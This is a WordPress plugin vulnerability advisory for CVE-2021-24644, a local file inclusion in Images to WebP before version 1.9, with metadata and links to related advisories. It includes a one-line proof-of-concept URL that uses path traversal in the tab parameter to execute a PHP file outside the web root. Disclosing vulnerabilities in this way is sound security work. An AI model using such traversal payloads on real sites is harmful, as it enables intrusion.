Images to WebP < 1.9 – Authenticated Local File Inclusion | CVE 2021-24644 | Plugin Vulnerabilities

Description

The plugin does not validate or sanitise the tab parameter before passing it to the include() function, which could lead to a Local File Inclusion issue

Proof of Concept

Assuming WordPress installed at C:\xampp\htdocs\wordpress,

https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=%2F..%2F..%2F..%2F..%2F..%2Fphp_file

This will execute php_file.php at C:\xampp, outside the web-exposed directory.

Affects Plugins

Fixed in 1.9

References

CVE

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

5a363eeb-9510-4535-97e2-9dfd3b10d511

Timeline

Publicly Published

2021-10-19 (about 4 years ago)

Added

2021-10-19 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2022-01-31

Title

Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

Published

2025-06-22

Title

Download Counter <= 1.4 - Unauthenticated Arbitrary File Read

Published

2015-06-03

Title

N-Media Website Contact Form with File Upload <= 1.5 - Local File Inclusion

Published

2015-07-03

Title

Swim Team < 1.45 - Local File Inclusion

Published

2025-06-24

Title

FW Food Menu <= 6.0.0 - Unauthenticated Arbitrary File Deletion